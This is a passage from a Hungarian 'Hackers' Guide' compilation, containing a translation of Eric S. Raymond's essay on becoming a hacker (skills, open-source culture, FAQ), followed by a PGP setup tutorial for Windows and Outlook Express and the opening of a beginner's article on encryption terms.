elkerülhetetlen lesz, kitalálnak valami ostoba okot. Tehát a parancsolgató magatartás<br />
ellen küzdeni kell, bárhol ahol találkozol vele, nehogy megfojtson Téged, vagy hacker<br />
társaidat.<br />
(Ez nem jeleni azt, hogy mindennemű hatalmat bírálni kell. A gyerekeknek<br />
szükségük van irányításra, és a bűnözőknek felelniük kell tetteikért. A hacker dönthet<br />
úgy, hogy elfogad bizonyos szintű irányítást, ha valami olyasmit kap ez által, ami<br />
fontosabb Neki, mint az utasítások követésére elpazarolt idő. De ez csakis<br />
korlátozott lehet, szó nincsen arról a személyes behódolásról, amit a parancsolgató<br />
beállítottságú emberek elvárnak.)<br />
A parancsolgató ember lételeme a cenzúra és a titkolózás. Bizalmatlan mindennel<br />
szemben, ami önkéntes együttműködés és információmegosztás -- csak az olyan<br />
`együttműködést' szereti, amit ő irányít. Tehát ha hackerként akarsz viselkedni, ki kell<br />
fejlesszél egy ösztönös ellenszenvet a cenzúra, a titkolózás és a felelős felnőtt<br />
emberek erőszakos kényszerítése iránt. Nem csak hinned kell, hogy ez a helyes,<br />
hanem e szerint kell cselekedned.<br />
5. A magatartás nem helyettesíti a kompetenciát<br />
Ahhoz, hogy hacker lehess, ki kell fejlesztened az előbb felsorolt tulajdonságok közül<br />
néhányat. De kizárólag a viselkedés másolásával nem lehetsz hacker, ugyanúgy,<br />
ahogy világbajnok atléta sem, vagy rocksztár. A hackerré váláshoz intelligencia kell,<br />
gyakorlat, elhivatottság és kemény munka.<br />
Ezért meg kell tanulnod, hogy nem szabad bízni a viselkedésben, és tisztelni kell<br />
bármilyen szaktudást. A hacker nem pazarolja az idejét szimulánsokra, de értékeli a<br />
szakértelmet -- főleg a hackeléssel kapcsolatos szakértelmet, de bármilyen más<br />
irányú szaktudás is elismerendő. Ha a szaktudásod olyan területet is lefed, amihez<br />
kevesen értenek, az jó, ha olyan terület szakértője vagy, ami precíz logikai<br />
képességeket, szellemi erőt és koncentrációs képességet igényel, az a legjobb.<br />
Ha tiszteled a hozzáértést, örömöd telik majd a képességeid fejlesztésében -- a<br />
kemény munka és az, hogy ennek szenteled magad, egy komoly játék lesz, és nem<br />
robotolás. Ez életbevágóan fontos, ha hacker akarsz lenni.<br />
Alapvető képességek hackeléshez<br />
58
Hackers’ Guide<br />
A hacker hozzáállás létfontosságú, de a képességek még fontosabbak. A viselkedés<br />
nem helyettesíti a kompetenciát, van egy alapvető képességtár, amivel rendelkezned<br />
kell, mielőtt a hackerek társuknak tartanak.<br />
Ezek a képességek lassan változnak az idők során, ahogy a technológia fejlődik, új<br />
területek jönnek létre, melyek új képességeket igényelnek, a régiek ezzel<br />
párhuzamosan elavulnak. Például, az alapképességek közé tartozott régebben a<br />
gépi kódban való programozás, míg a HTML ismerete csak az utóbbi időben vált<br />
szükségessé. Jelenleg a következők tartoznak a hacker alapműveltségéhez:<br />
1. Tanulj meg programozni<br />
Ez, természetesen, az alapvető tudás, minden hacker számára. Ha nem ismersz<br />
egyetlen programozási nyelvet sem, javaslom, hogy kezdjél a Pythonnal. Jól<br />
tervezett, jól dokumentált és relatíve kíméletes a kezdőkkel. Annak ellenére, hogy jó<br />
kezdő nyelv, nem csak játékszer; a python egy nagyon sokoldalú és rugalmas nyelv,<br />
amely alkalmas nagy projektek létrehozására.<br />
Legyél tisztában azzal, hogy nem fogod elérni a hacker szaktudását, vagy akárcsak<br />
egy egyszerű programozóét sem, ha csak egy nyelvet ismersz -- meg kell tanulnod<br />
nyelvtől függetlenül gondolni a programozási problémákra. Ahhoz, hogy igaz hacker<br />
lehess, el kell jussál arra a pontra, amikor egy új programozási nyelvet néhány nap<br />
alatt meg tudsz tanulni, a leírások alapján, abból kiindulva, amit már tudsz. Ez azt<br />
jelenti, hogy több, egymástól nagyon különböző nyelvet kell megtanuljál.<br />
Ha komoly programozásba kezdesz, meg kell tanulnod a C nyelvet, a Unix<br />
alapnyelvét (a C-t ettől függetlenül nem ajánlom első nyelvnek). Az egyéb fontos<br />
nyelvek közé tartozik a Perl és a LISP. A Perlt gyakorlati okok miatt érdemes<br />
megtanulni; gyakran használják dinamikus web oldalak létrehozásához és rendszeradminisztrációhoz,<br />
tehát ha nem is írsz soha Perlt, mindenképp érdemes<br />
megtanulnod olvasni azt. A LISP-et a megvilágosodás mély érzése miatt érdemes<br />
megtanulni, amit akkor érzel, amikor végre sikerül megérteni, hogy miről is van szó;<br />
ez a tapasztalat jobb programozóvá tesz a hátralévő napjaidra, még akkor is, ha nem<br />
használod majd gyakran a LISP-et.<br />
A legjobb, igazából, ha ezt a négy nyelvet (Python, C, Perl, és LISP) mind<br />
megtanulod. Amellet, hogy ezek a hacker alapnyelvei, nagyon eltérő módon közelítik<br />
meg a programozást, mindegyikből hasznos és értékes új ismeretekre tehetsz szert.<br />
Nem tudok kimerítő leírást adni arról, hogy hogyan tudsz megtanulni programozni --<br />
nagyon összetett tudásról van szó. Egyet azonban elárulhatok: a könyvek és<br />
tanfolyamok nem érnek túl sokat (sok, valószínűleg a legtöbb hacker autodidakta).<br />
Aminek van értelme: (a) kódot olvasni és kódot írni.<br />
Programozni megtanulni ugyanolyan, mint a saját anyanyelveden megtanulni írni. A<br />
legjobb módszer, ha beleolvasol abba, amit a mesterek írtak, majd írsz valamit,<br />
utána olvasol még egy jó adag kódot, írsz egy keveset, olvasol még egy adagot, írsz<br />
még egy kicsit... és mindezt addig ismétled, amíg a saját kódodban el nem kezded<br />
felfedezni a példaképek kódjainak jó vonásait.<br />
Régen nehézkes volt jó, olvasásra érdemes kódot találni, mert kevés nagy program<br />
forráskódja állt a zöldfülű hackerfiókák rendelkezésére. Ez drasztikusan<br />
megváltozott; ma már nyílt forráskódú szoftverek, programozási eszközök és<br />
59
Hackers’ Guide<br />
operációs rendszerek (ezeket is mind hackerek írták) könnyedén elérhetők bárki<br />
számára. Ez át is vezet minket a következő témához...<br />
2. Szerezz be egy nyílt forráskódú Unixot és tanuld meg használni<br />
Abból indulok ki, hogy van egy PC-d, vagy hozzáférsz valahol egyhez (ezeknek a<br />
mai gyerekeknek olyan könnyű dolguk van :-)). Az legfontosabb lépés a hackerré<br />
válás útján: szerezz be valamilyen Linuxot vagy BSD-Unixot, telepítsd fel a gépedre,<br />
és tanuld meg használni.<br />
Igen, vannak a Unixon kívül más operációs rendszerek a világon. De azokat<br />
binárisokban terjesztik, ergo nem tudod olvasni vagy módosítani a kódot. Hackelni<br />
tanulni DOS, Windows vagy MacOS alatt olyan, mintha kényszerzubbonyban<br />
próbálnál táncolni tanulni.<br />
Mindezek mellett, nem szabad megfeledkezni arról, hogy a Unix az Internet<br />
operációs rendszere. Megtanulhatod ugyan az Internet használatát Unix ismeretek<br />
nélkül, de biztosan nem lehetsz Internetes hacker. Éppen ezért, manapság a hacker<br />
kultúra elég határozottan Unix-központú. (Ez nem volt mindig így, néhány régi<br />
motoros a mai napig nem tud ezzel megbékélni, de a Unix és az Internet közötti<br />
szimbiózis annyira megerősödött, hogy még a Microsoft sem tud igazán csorbát<br />
ejteni rajta.)<br />
Tehát húzzál fel egy Unixot -- én személy szerint a Linuxot szeretem, de van<br />
választék (és igen, lehet ugyanazon a gépen felváltva Linuxot és DOS / Windows-t<br />
használni). Tanuld meg használni. Játsszál vele. Lődd össze az Internetet vele.<br />
Olvasd a forrásokat. Módosítsd a forrásokat. Olyan programozási eszközökkel fogsz<br />
találkozni Linux alatt (pl. C, LISP, Python és Perl), amilyenekről egy Microsoft<br />
operációs rendszer alatt álmodni sem mernél, jól szórakozol, és olyan sok tudást<br />
szívsz magadba, hogy bele sem gondolsz, egészen addig, amíg már profi<br />
hackerként vissza nem emlékszel ezekre az időkre.<br />
Ha többet akarsz tudni a Unix-ról, vess egy pillantást a Loginatakára.<br />
Információt találsz arról, hogy hogyan és honnan szerezzél be Linuxot a Honnan<br />
szedjek Linuxot? című oldalról.<br />
Találhatsz BSD Unix-al kapcsolatos segítséget és linkeket a http://www.bsd.org/<br />
címen.<br />
(Megjegyzés: Nem ajánlom, hogy Linux vagy BSD telepítésbe kezdjél egyedül, ha<br />
teljesen kezdő vagy a témában. Ha Linuxal próbálkozol, keress meg egy helyi<br />
felhasználó csoportot [ilyen Magyarországon az LME] és kérj segítséget, vagy vedd<br />
fel a kapcsolatot a Linux Internet Support Co-Operative-al. A LISC üzemeltet IRC<br />
csatornákat is, ahol [angol nyelvű] segítséget kaphatsz.)<br />
3. Tanuld meg használni a Világhálót (World Wide Web) és a tanulj meg HTML-t<br />
írni<br />
A hackerek által létrehozott dolgok többsége észrevétlenül a háttérben működik,<br />
segíti a gyárakban, irodákban és egyetemeken folyó munkát, látszólag nem<br />
befolyásolva a nem-hackerek életét. A Web az egyetlen nagy kivétel, a hatalmas<br />
csillogó-villogó hacker játékszer, amiről még a politikusok is elismerik, hogy<br />
60
Hackers’ Guide<br />
megváltoztatja a világot. Ezért (valamint egy csomó más nyomós ok miatt) meg kell<br />
tanulnod a Webbel dolgozni.<br />
Ez nem csak azt jelenti, hogy meg kell tanulnod Web-böngészőt használni (ezt bárki<br />
megteheti), hanem azt is, hogy el kell sajátítanod a HTML-t, a web nyelvét. Ha nem<br />
tudsz programozni, a HTML tanulása közben felvehetsz bizonyos jó szokásokat,<br />
amiknek hasznát veszed a későbbi tanulmányaid során. Tehát hozzál létre egy<br />
honlapot.<br />
Az, hogy van egy honlapod, még közelítőleg sem jelenti azt, hogy hacker vagy. A<br />
Web tele van honlapokkal. A legtöbbjük értelmetlen, nulltartalmú hulladék -- tarka<br />
hulladék, mondhatnád, de attól még ugyanúgy szemét. (erről többet olvashatsz a A<br />
HTML Pokol oldalán).<br />
Hogy olvasásra érdemes legyen egy lap, kell legyen tartalma -- érdekes és vagy<br />
hasznos kell legyen más hackerek számára. Ez átvezet a következő témához...<br />
Státus a Hacker kultúrában, közösségben<br />
Mint a legtöbb pénz és gazdaság nélküli kultúra, a hackerség meghatározó eleme a<br />
hírnév. Érdekes problémákat próbálsz megoldani, de azt, hogy ezek a problémák<br />
valójában mennyire érdekesek és hogy igazából a mennyire jó a megoldásod, csak<br />
azok tudják megítélni, akik szintén szakértők a kérdéses területen.<br />
Ehhez hasonlóan, amikor a hackerek szabályai szerint játszol, megtanulod, hogy az<br />
alapján kapod a jó pontokat, hogy mások mire tartják a szakértelmedet (ezért írtam<br />
korábban, hogy addig nem vagy igazi hacker, amíg nem a többiek hívnak annak). Ezt<br />
a tényt elhomályosítja az a kép, ami a hackelést magányos munkának tünteti fel,<br />
valamint az a hacker körökben elterjedt nézet, miszerint a büszkeség vagy az, hogy<br />
mások mit gondolnak, nem lehet a motiváló tényezők része.<br />
Egészen pontosan, a hackerség az, amit az antropológusok ajándék kultúrának<br />
neveznek. Nem az által szerzel egy ilyen társadalomban hírnevet, hogy elnyomsz<br />
másokat, azzal sem, hogy szép vagy, vagy olyan dolgokat birtokolsz, amikért mások<br />
áhítoznak, hanem azzal, hogy adsz. Másokra áldozod történetesen az idődet, a<br />
kreativitásodat és a szaktudásod gyümölcseit.<br />
Alapvetően öt dolgot tehetsz, hogy kivívd a hackerek elismerését:<br />
1. Írj nyílt forráskódú szoftvert<br />
Az első (legfontosabb és legelfogadottabb) módja a bevágódásnak, ha olyan<br />
programot írsz, amiről a hackerek úgy látják, hogy hasznos vagy jópofa, és<br />
elérhetővé teszed a forrását, hogy az egész közösség felhasználhassa azt.<br />
(Ezeket a munkákat ``free software''-nek hívtuk, de mivel nem volt mindenki számára<br />
egyértelmű, hogy a ``free'' a szabadra vagy az ingyenesre utal-e, sokunk inkább az<br />
``open-source'' azaz nyílt forráskódú szoftver kifejezést részesíti előnyben.)<br />
A hacker kultúra legelismertebb félistenei olyan emberek, akik nagy, hasznos<br />
programokat írtak, amikre széles körben volt szükség, majd a közösség<br />
rendelkezésére bocsátották ezeket, hogy mindenki szabadon felhasználhassa őket.<br />
2. Segíts nyílt forráskódú szoftvert tesztelni és debuggolni<br />
61
Hackers’ Guide<br />
Azok munkája is nagyon hasznos, akik tesztelik és javítják a nyílt forráskódú<br />
szoftvereket. Ebben a tökéletlen világban elkerülhetetlen, hogy a szoftverfejlesztésre<br />
szánt idő tetemes részét hibakereséssel és javítással töltsük. Ezért minden józan<br />
eszű, nyílt forráskódot karbantartó szerző egyet fog velem érteni, amikor azt írom,<br />
hogy a jó béta-tesztelő (aki világosan le tudja írni a tüneteket, jól tudja lokalizálni a<br />
problémát, el bírja viselni a hibákat az összecsapott kiadásokban, hajlandó néhány<br />
egyszerű diagnosztizáló eszközt alkalmazni) megéri a súlyát gyémántban. Egy szem<br />
ilyen béta-tesztelő eldöntheti, hogy a hibakeresés egy kétségbeejtő, kimerítő<br />
rémálom vagy csak egy hasznos kellemetlenség.<br />
Ha újonc vagy, keress egy fejlesztés alatt álló programot, ami érdekel és próbálj jó<br />
béta-tesztelő lenni. Innen már magától megy minden, a tesztelés után besegíthetsz a<br />
hibakeresésbe, utána besegíthetsz a fejlesztésbe. Sokat tanulhatsz így, és jó pontot<br />
szerezhetsz olyan embereknél, akik segíthetnek majd a későbbiek során.<br />
3. Tegyél közzé hasznos információkat<br />
Még egy jó dolog, amit megtehetsz, a hasznos és érdekes információ kiszűrése majd<br />
Web lapon, vagy GyIK (Gyakran Ismételt Kérdések listája) dokumentumokban való<br />
közzététele.<br />
A főbb szakmai GyIK-ek karbantartói majdnem olyan elismerésben részesülnek, mint<br />
a nyílt forráskódú szoftvert író programozók.<br />
4. Segíts működésben tartani az infrastruktúrát<br />
A hacker kultúrát (és így egyben az Internet fejlesztését is) önkéntesek tartják<br />
karban, működésben. Sok szükséges ám kevésbé látványos és vonzó munkát kell<br />
elvégezni, hogy a gépezet működjön -- levelezési listákat kell adminisztrálni,<br />
hírcsoportokat moderálni, hatalmas szoftver archívumokat fenntartani, RFC-ket és<br />
más technikai szabványokat írni.<br />
Azok az emberek, aki ezeket a feladatokat jól látják el, nagy tiszteletben állnak, mert<br />
mindenki tudja, hogy a munkájuk borzalmasan időt rabló, és nem olyan mókás, mint<br />
a kódolás. Akik ezt a fajta munkát csinálják, elhivatottak.<br />
5. Szolgáld a hacker társadalmat<br />
Végül, szolgálhatod és népszerűsítheted magát a hacker kultúrát (például azzal,<br />
hogy írsz egy részletes bevezetőt arról, hogy hogyan lesz az emberből hacker :-)).<br />
Ez nem olyasmi, amit meg tudsz csinálni, amíg nem vagy a hacker társadalom<br />
résztvevője egy bizonyos időn keresztül és nem válsz ismerté az előző négy pont<br />
valamelyike által.<br />
A hacker társadalomnak nincsenek kimondott vezetői, de vannak hősei, ``vénjei'',<br />
történészei és szóvivői. Ha már elég régóta vagy a csatasorban, ezek egyikévé<br />
nőheted ki magad. De ne feledd: a hackerek bizalmatlanok a túl nagy mellénnyel<br />
rendelkező ``vénekkel'' szemben, tehát veszélyes ezt a stádiumot látványosan elérni.<br />
Ne törekedjél erre, inkább helyezkedj úgy, hogy az öledbe hulljon, majd legyél<br />
szerény, és ápold gondosan a kapcsolataidat.<br />
A Hacker / Kocka összefüggés<br />
A népszerű híreszteléssel ellentétben, ahhoz, hogy hacker legyél, nem kell, hogy<br />
"kocka" légy. Ettől függetlenül segítségedre lehet -- a valóságban sok hacker<br />
62
Hackers’ Guide<br />
"kocka". Ha társadalmilag kirekesztett vagy, az segít abban, hogy az igazán fontos<br />
dolgokra koncentrálj, mint pl. az elmélkedés és a hackelés.<br />
Ezért sok hacker felvállalja a ``kocka'' bélyeget, sőt, büszkén használják a durvább<br />
``geek'' kifejezést is -- így függetlenítik magukat a konvencionális társadalmi<br />
elvárásoktól. A Geek oldalon olvashatsz bővebben a témáról.<br />
Ha meg tudod oldani, hogy elég figyelmet fordítasz a hackelésre ahhoz, hogy jó<br />
hacker legyél, és emellett normális életet is tudsz folytatni, akkor jó. Ez manapság<br />
sokkal könnyebb feladat egy újonc számára, mint az én időmben volt, a 70-es<br />
években; napjainkban a társadalom sokkal toleránsabb a techno-megszállottakkal<br />
szemben. Sőt, egyre több ember jön rá, hogy a hackerek gyakran kiváló minőségű<br />
szerető és férj alapanyagok.<br />
Ha azért vonz a hackelés, mert nincs életed, az is OK -- legalább nem vonja el<br />
semmi a figyelmedet. Lehet, hogy később még az is kialakul.<br />
Pontok a stílusért<br />
Még egyszer, ahhoz, hogy hacker legyél, úgy kell gondolkodj, mint egy hacker.<br />
Vannak dolgok, amiket ez érdekében megtehetsz, ha éppen nem számítógép előtt<br />
ülsz. Ezek nem helyettesítik a hackelést (azt semmi sem helyettesítheti), de sok<br />
hacker foglalkozik ilyen dolgokkal, így ezek is kapcsolódnak a hackelés lényegéhez.<br />
• Olvass tudományos-fantasztikus irodalmat. Járjál tudományos-fantasztikus<br />
témájú klubokba, gyűlésekre. (Ott találkozhatsz hackerekkel és protohackerekkel).<br />
• Tanulmányozd a Zen-t, és/vagy tanulj harci művészeteket. (A meditálás is<br />
hasonló sok szempontból.)<br />
• Tanuld meg a zenét elemző füllel hallgatni. Tanuld meg értékelni az egyéni<br />
zenei stílusokat. Tanulj meg valamilyen hangszeren játszani vagy énekelni.<br />
• Barátkozz meg a szójátékokkal.<br />
• Tanulj meg jól és helyesen írni az anyanyelveden. (Meglepően sok hacker,<br />
többek között a legjobbak, akiket ismerek, jó írók.)<br />
Ezek közül minél több dolog tűnik természetesnek Neked, annál jobb hackeralapanyag<br />
vagy. Hogy miért pont ezek a dolgok, az nem teljesen világos, de<br />
valószínűleg összefüggés van közöttük és az agy jobb és bal féltekéjében honos<br />
képességek sora között, amelyek a hacker számára elengedhetetlenek (a hacker<br />
képes kell legyen logikusan gondolkodni, de ki is kell tudjon lépni az adott probléma<br />
látszólagos logikájából).<br />
Végül néhány kerülendő dolog:<br />
• Ne használj ostoba, nagyzoló felhasználói azonosítót vagy becenevet.<br />
• Ne keveredj felesleges vitákba (flame háborúkba) a Usenet-en (máshol sem).<br />
• Ne hívd magad `cyberpunk'-nak és vesztegesd az idődet olyanra, aki annak<br />
titulálja magát.<br />
• Ne küldjél e-mail-eket tele helyesírási és nyelvtani hibákkal.<br />
63
Hackers’ Guide<br />
Ha ilyeneket csinálsz, legfeljebb rossz híred kel -- csak azt jegyzik meg rólad,<br />
mekkora balfácán vagy. A hackereknek jó a memóriájuk -- évekbe telhet amíg<br />
elfelejtik a kezdő botladozásaidat, és befogadnak.<br />
A becenevek problémájára külön visszatérnék. Az igazi személyed becenevek mögé<br />
rejtése gyerekes és ostoba dolog, és a crackerekre, warez d00dz-okra és más<br />
alsóbbrendű életformákra jellemző viselkedés. A hacker nem csinál ilyet; büszke arra<br />
amit csinál és amit elért, ezért szereti, ha az igazi nevét is ismerik. Tehát ha ilyen<br />
becenevet használsz, hagyd el, mert a hackerek között csak vesztesnek bélyegez.<br />
Egyéb források<br />
Peter Seebach karbantart egy kiváló Hacker GyIK-et menedzserek, főnökök<br />
számára, akik nem tudják hogyan álljanak a hacker beosztottakhoz. Ha Peter lapja<br />
nem lenne elérhető, próbáld az Excite-on keresztül megtalálni a lap egy másolatát.<br />
A Loginatakának van némi mondanivalója a Unix hacker képzettségét és<br />
hozzáállását illetően.<br />
Írtam egy esszét A hackerség rövid története címmel.<br />
Írtam egy esszét, A Katedrális és a Bazár címmel, ami részletesem elemzi a Linux és<br />
az open-source köré épülő társadalmak működését. Még közvetlenebbül tárgyaltam<br />
ezt a témát a folytatásban a Homesteading the Noosphere-ben.<br />
Gyakran Ismételt Kérdések<br />
K: Megtanítasz hackelni?<br />
V: Amióta először megjelentettem ezt a lapot, hetente (gyakran naponta) többen<br />
kérik, hogy "tanítsak meg mindent a hackelésről". Sajnos, erre sem időm, sem<br />
energiám nincs; a saját hackeléssel kapcsolatos projektjeim kiteszik az időm 110%át.<br />
Még ha lenne is lehetőségem arra, hogy a hackelést tanítsam, nem tehetném, mert<br />
ez egy olyan hozzáállás és képesség, amit magadnak kell egyedül elsajátítanod.<br />
Meg fogod látni, hogy az igazi hackerek örömmel segítenek neked, de nem fognak<br />
tisztelni és elismerni, ha mindent a szádba kell rágjanak.<br />
Tanulj meg először néhány dolgot. Mutasd meg, hogy próbálkozol, hogy tudsz<br />
önállóan tanulni. Ezek után a hackereket már csak specifikus kérdésekkel zargasd.<br />
K: Akkor hol kezdjem?<br />
V: Valószínűleg a legjobb módja a hackeléssel való ismerkedésnek az, ha elmész<br />
egy Linux Felhasználói Csoport gyűlésére. Megtalálhatod ezeknek a csoportoknak a<br />
listáját az LDP General Linux Information Page weblapon; valószínűleg van egy a<br />
közeledben, esetleg egy főiskolán vagy egyetemen. A Linux Felhasználói Csoport<br />
tagjaitól egyszerűen szerezhetsz Linuxot és egészen biztosan segítenek majd a<br />
telepítésnél is.<br />
K: Mikor kell kezdenem? Nem vagyok én már ehhez túl öreg?<br />
V: Legyél bármilyen idős, a motiváció a fontos. Általában a 15 és 20 év közötti<br />
korosztály érdeklődését kelti fel a hackelés, de ismerek kivételeket mind a két<br />
irányban.<br />
K: Mennyi ideig tart, amíg megtanulok hackelni?<br />
64
Hackers’ Guide<br />
V: Ez attól függ, hogy mennyire vagy tehetséges és mennyire dolgozol keményen.<br />
Általában 18 hónap vagy 2 év alatt már tiszteletreméltó képességekre tehetsz szert,<br />
ha ügyes vagy. Ennek ellenére ne gondold, hogy ennyi az egész; ha igazi hackerré<br />
válsz, sohasem hagyod abba a tanulást, életed hátralevő részét a képességeid<br />
tökéletesítésével töltöd majd.<br />
K: Segítenél feltörni egy rendszert, vagy megtanítanál betörni?<br />
V: Nem. Az aki ennek a GyIK-nek az elolvasása után ilyen kérdést tesz fel, túl ostoba<br />
ahhoz, hogy bármit tanítsak neki, még ha időm lenne is. Bármilyen ilyen témában<br />
küldött e-mail a szemetes kosárban köt ki, vagy rosszabb esetben a feladó durva<br />
válaszra számíthat.<br />
K: Betörtek hozzám. Segítesz elkerülni a jövőbeni támadásokat?<br />
V: Nem. Ezt a kérdést mindig olyanok teszik fel, akik Windows-t használnak. A<br />
Windows-os rendszereket nem lehet hatékonyan biztonságossá, a betörésekkel<br />
szemben ellenállóvá tenni; a kódban és a szoftver architektúrájában túl sok lyuk van,<br />
körülbelül olyan vállalkozás ez, mintha pohárral akarnánk egy süllyedő hajóból a<br />
vizet kimerni. Az egyetlen megbízható megoldás, ha átváltasz Linuxra vagy<br />
valamilyen másik igazi biztonságos operációs rendszerre.<br />
K: Hol találkozhatok, beszélhetek igazi hackerekkel?<br />
V: A legjobb megoldás, ha keresel egy Linux vagy Unix Felhasználói csoportot és<br />
elmész a gyűléseikre (találsz linkeket az LDP weblapján a Metalabnál).<br />
(Régebben azt írtam volna itt, hogy IRC-n nem találkozhatsz igazi hackerrel, de úgy<br />
tűnik ez változik. Mostanában igazi hacker csoportoknak, mint pl. a GIMP és a Perl<br />
körül serénykedőknek, saját IRC csatornájuk van.)<br />
K: Tudsz ajánlani hasznos könyveket a hackeléssel kapcsolatban?<br />
V: Én tartom karban a Linuxos Irodalomlista HOGYANt , ez segítségedre lehet. A<br />
Loginataka szintén érdekes lehet.<br />
K: Mit kell először megtanuljak?<br />
V: A HTML-t, ha még nem ismernéd. Sok csillogó-villogó, lényegtelen dolgokra<br />
fókuszáló rossz HTML-ről szóló könyv van forgalomban, és kétségbeejtően kevés jó.<br />
Személyes kedvencem az HTML: The Definitive Guide című O'Reilly kiadvány.<br />
A HTML azonban nem programozási nyelv. Ha felkészültél arra, hogy elkezdjél<br />
programozni tanulni, véleményem szerint a Pythont válaszd. Sokan a Perlt ajánlják,<br />
ami igaz, hogy elterjedtebb, mint a Python, de nehezebb megtanulni és (véleményem<br />
szerint) nincs olyan jól megtervezve. Találhatsz linkgyűjteményt a kezdő Python<br />
programozó számára a Weben.<br />
A C igazán fontos, de ugyanakkor sokkal nehezebb, mint a Python vagy a Perl. Ne<br />
próbáld elsőként megtanulni.<br />
Windows felhasználók, ne ragadjatok le a Visual Basic-nél! Rossz programozási<br />
szokásokat fogtok felvenni tőle, és nem hordozható, teljesen a Windows platformra<br />
van utalva. Kerülendő.<br />
K: Muszáj utálnom a Microsoftot?<br />
V: Nem, nem muszáj. Nem azért, mert nem érdemli meg, de léteztek hacker<br />
közösségek a Microsoft előtt, és lesznek még akkor is, amikor a Microsoft már régen<br />
65
Hackers’ Guide<br />
történelem lesz. A Microsoft utálata helyett szeresd inkább a saját erődet. Írjál jó<br />
kódot, ezzel többet érsz el, mint a Microsoft mocskolásával, és még a hírnevedet<br />
sem sodrod veszélybe.<br />
K: De nem veszélyezteti az open-source szoftverfejlesztés a programozók<br />
megélhetését?<br />
V: Ez valószínűtlen -- sőt, a nyílt forráskódú szoftveripar inkább új állásokat hoz létre.<br />
Ha az, hogy egy program meg van írva, nettó nyereséggel jár, a programozót meg<br />
fogják fizetni, függetlenül attól, hogy a program nyílt lesz-e, miután elkészül. Az is<br />
mindegy, hogy mennyi "nyílt" szoftvert írnak a programozók, úgy tűnik, hogy növekvő<br />
kereslet van az új és testre szabott alkalmazások iránt. Többet írtam erről a témáról<br />
az Open Source lapokon.<br />
K: Hogyan fogjak neki? Honnan szerezzek szabad Unixot?<br />
V: Feljebb ezen az oldalon találsz mutatókat a legelterjedtebb szabad Unixokra.<br />
Ahhoz, hogy hacker legyen belőled, motivációra, vállalkozó szellemre és az önálló<br />
tanulás képességére van szükséged. Vágj bele most...<br />
Eric S. Raymond mailto:esr@thyrsus.com<br />
Fordította:<br />
Kovács Emese mailto:emese@goliat.eik.bme.hu<br />
************************************************************************************************<br />
Használjatok PGP-t<br />
Ebben a cikkben leírom, hogy Windows98/NT/2000 alatt hogyan tudjátok<br />
használatba venni a PGP-t és egyszeruen biztonságossá tenni a levelezéseteket! A<br />
titkosítás cikkben már írtam arról, hogy mi a digitális aláírás értelme, most erre nem<br />
térek ki, csak azt írom itt le, hogy honnan lehet a szükséges cuccokat letölteni, és mit<br />
kell csinálni!<br />
A PGP legújabb változatát a http://web.mit.edu/network/pgp.html címrol lehet<br />
leszedni. Válasszuk ki a megfelelo verziót (PGP Freeware v6.5.3) és Download. Itt<br />
feltesz négy kérdést, amelyekre mindre Yes-el kell válaszolni, aztán már bent is<br />
vagyunk a letöltés oldalon. Ez az oldal csak 10 percig él, utána már nem tudunk<br />
letölteni, hanem vissza kell menni (nem tudom ez a hülyeség miért kell, de hát ez<br />
van). A PGPFreeware 6.5.3 mérete olyan 7.5 mega körül van.<br />
Ezt installáljuk fel. Ezután a Start menübe kapunk egy PGP nevu menüpontot, és<br />
ebben van egy olyan ikon, hogy PGPtray. Ezt elindítva betelepedik lentre, az óra<br />
66
mellé, és használatba vehetjük a PGP-t. (Érdemes a PGPtray-t induláskor<br />
automatikusan elindíttatni vele.)<br />
Hackers’ Guide<br />
Indítsuk el a PGPKeys -t, ezzel fogunk egy új kulcspárt generálni magunknak, amivel<br />
utána titkosíthatjuk a cuccokat. Van ott egy olyan gomb, hogy Generate keys. Az<br />
értelemszeru kérdéseken túl válasszuk a Diffie-Hellman/DSS típusú kulcsot, aztán<br />
válasszuk ki a kulcsméretet (megfelelo a default 2048/1024 is). Legyen keypair never<br />
expires, aztán írjuk be a választott jelkifejezést (jelszót, ami lehetoleg jó bonyolult<br />
legyen) kétszer. Ezután legenerálja a kulcsot a pgp, hagyjuk üresen a Send my key<br />
to the root server now ikszelonégyzetet és Finish. A PGPKeys ablakban ezután<br />
megjelenik a kulcsod. Kattints rá jobb gombbal és Set as default.<br />
Ezek után, ha elindítod az Outlook Expresst, és írsz egy új levelet valakinek, akkor a<br />
fölso gomboknál megjelenik három új gomb. Az elso az Encrypt, ezzel tudjuk<br />
titkosítani a címzettnek a levelet (ha a címzett kulcsa megvan a keyringen). A<br />
másodikkal tudjuk digitálisan aláírni a levelünket. (Be kell nyomni a gombot, és az<br />
aláírás a levél elküldésénél történik meg.) A harmadik elindítja a PGPKeys-t.<br />
Nagyjából ennyi. Ha valakinek van kérdése, írjon mailt.<br />
************************************************************************************************<br />
A titkosításról<br />
Fordítás, eredeti cím/szerzo: "PGP Encryption for Beginners."/the saint/<br />
De eloször, kezdjük ezzel: mi a fenének akarnád titkosítani az adataidat?<br />
Szóval!! képzeld el, hogy valaki betör a számítógépedbe. Ahelyett, hogy ellophatná<br />
az összes hitelkártyaszámodat és jelszavadat, és elolvasná az emailjeidet, helyette<br />
csak titkosított hulladékot fog kapni, ami semmit nem jelent neki, és igencsak nehéz<br />
lesz visszakódolni.<br />
Ha nem egyedül használod a számítógépet. Kockáztatnád, hogy valaki hozzáférjen a<br />
privát adataidhoz? Remélem, érted, mirol van szó.<br />
A PGP (Pretty Good Privacy) - egy rendszer, amely kombinálja a hagyományos és a<br />
nyilvános kulcsú titkosítások elonyeit. (Ezekrol késobb lesz szó majd.) Néha hibrid<br />
titkosításnak is nevezik (hybrid cryptosystem).<br />
Bevezetés a kriptográfiába<br />
Legeloször is megismertetnék veled néhány szót, amelyet gyakran fogok használni<br />
ebben a cikkben:<br />
67
Hackers’ Guide<br />
1. Nyílt szöveg (plain text) - adat, amely könnyen olvasható és megértheto, speciális<br />
muveletek nélkül. (Például ez a cikk nyílt szöveg, amit most olvasol.)<br />
2. Rejtjelzés (encryption) - A nyílt szöveg megváltoztatásának útja, amely során<br />
megváltozik az alakja, de az adatok nem vesznek el, és a célja az, hogy "elrejtse" az<br />
adatot a "gonoszok" elol.<br />
3. Rejtjelezett szöveg (ciphertext) - a rejtjelzés végeredménye - elso ránézésre egy<br />
szeméthalom.<br />
4. Visszafejtés (decryption) - módszer a rejtjelezett szöveg nyílt szöveggé<br />
konvertálására.<br />
5. Titkosítás (cryptography) - az adatok rejtjelzésének / visszafejtésének tudománya.<br />
6. Titkosítás megfejtése (cryptanalysis) - a rejtjelezett adat feltörésének tudománya,<br />
különbözo eszközöket és technikákat használ.<br />
